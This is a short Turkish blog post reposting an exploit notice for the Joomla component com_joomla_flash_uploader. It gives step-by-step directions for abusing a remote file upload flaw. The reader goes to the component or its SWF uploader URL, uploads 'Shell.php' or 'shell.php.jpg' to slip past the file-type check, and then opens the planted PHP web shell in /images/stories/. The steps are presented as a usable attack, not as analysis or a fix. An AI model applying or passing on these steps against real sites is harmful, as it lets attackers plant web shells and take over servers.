Joomla Component com_joomla_flash_uploader Remote File Upload

Joomla com_joomla_flash_uploader eklentisinde bulunan açık sayesinde uzaktan dosya upload edilebiliyor.
Uzaktan upload edilebilen php shell scriptlerin tehlikelerinden daha önce bahsetmiştim.

First Go to ==> http://localhost/index.php?option=com_joomla_flash_uploader&Itemid=[id]

 You Will Find a Flash Uploader 
  
 Or Go To http://localhost/administrator/components/com_joomla_flash_uploader/tfu/tfu_210.swf
 
 You Can Upload Your Shell.php or shell.php.jpg
 
 In The Flash Uploader you'll see  Your Shell !! 

 4 example ==> Upload folder: ./images/stories/ ==> Your shell => http://localhost//images/stories/shell.php

Bir önceki yazımız olan Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability başlıklı makalemizde Smartfren Connex EC Local exploit ve windows local exploit hakkında bilgiler verilmektedir.

Bir Cevap Yazın